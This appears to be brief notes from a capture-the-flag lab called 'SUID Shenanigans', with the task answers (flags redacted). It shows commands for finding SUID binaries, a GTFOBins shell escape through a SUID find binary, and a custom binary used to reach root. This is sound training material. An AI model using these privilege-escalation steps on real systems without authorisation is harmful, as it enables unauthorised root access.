SUID Shenanigans

nmap
65534 - ssh
find suid perm for user igor
find / -user igor -type f -perm /4000 2> /dev/null   /usr/bin/find
						     /usr/bin/nmap

exploit find command by {gtfobins}
find . -exec /bin/sh \; -quit
cat /home/igor/flag1.txt
{answer 2}
find / -user root -type f -perm /4000 2> /dev/null
/usr/bin/system-control   --> allow to run command
{answer 3}

Task

  • What port is SSH running on?
    65534
    
  • Find and run a file as igor. Read the file /home/igor/flag1.txt
    [redacted challenge flag]
    
  • Find another binary file that has the SUID bit set. Using this file, can you become the root user and read the /root/flag2.txt file?
    [redacted challenge flag]